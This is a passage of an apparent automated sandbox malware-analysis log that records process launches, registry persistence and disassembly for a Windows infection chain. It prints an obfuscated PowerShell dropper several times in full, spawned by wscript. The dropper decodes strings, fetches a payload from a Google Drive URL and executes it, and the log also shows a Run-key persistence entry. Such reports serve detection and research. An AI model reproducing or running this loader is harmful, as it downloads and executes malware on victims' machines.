CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe G
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886F171C8 push esp; retf 2_2_00007FF886F171C9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00FCD632 pushfd ; ret 5_2_00FCD641
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07650638 push eax; mov dword ptr [esp], ecx5_2_07650AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07650AB8 push eax; mov dword ptr [esp], ecx5_2_07650AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E28CD push ebx; ret 5_2_084E2B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E2A6C push ebx; ret 5_2_084E2B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E0230 pushfd ; ret 5_2_084E0235
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_084E2AF3 push ebx; ret 5_2_084E2B32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C09AD push ecx; mov dword ptr [esp], ecx12_2_246C09B6
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2528 push ss; retf 16_2_058C2557
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C94A4 push edx; ret 16_2_058C94A5
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058BC7B2 push edi; ret 16_2_058BC7B3
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2F5C pushad ; retf 16_2_058C2F77
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2EF6 pushad ; retf 16_2_058C2F77
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C2E10 push ecx; iretd 16_2_058C2EBA
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058BC1B4 push ecx; iretd 16_2_058BC1B5
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C294B push edx; iretd 16_2_058C2952
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C4974 push ds; retn 03BDh16_2_058C497A
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058CE00D push 54F79CCFh; retf 16_2_058CE012
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B7809 pushad ; ret 16_2_058B7836
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B33B0 push edx; retf 16_2_058B33B2
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B7BCD push edx; retf 16_2_058B7BCE
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C931D push edi; ret 16_2_058C932D
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B2321 push edi; ret 16_2_058B2331
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C8B4D push edi; retf 16_2_058C8B5C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C8B50 push edi; retf 16_2_058C8B5C
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B22F6 push edi; ret 16_2_058B2331
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058C324B push ebx; ret 16_2_058C325B
        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exeCode function: 16_2_058B226C push edx; iretd 16_2_058B226D
        Source: C:\Windows\SysWOW64\replace.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YDN4CJump to behavior
        Source: C:\Windows\SysWOW64\replace.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YDN4CJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
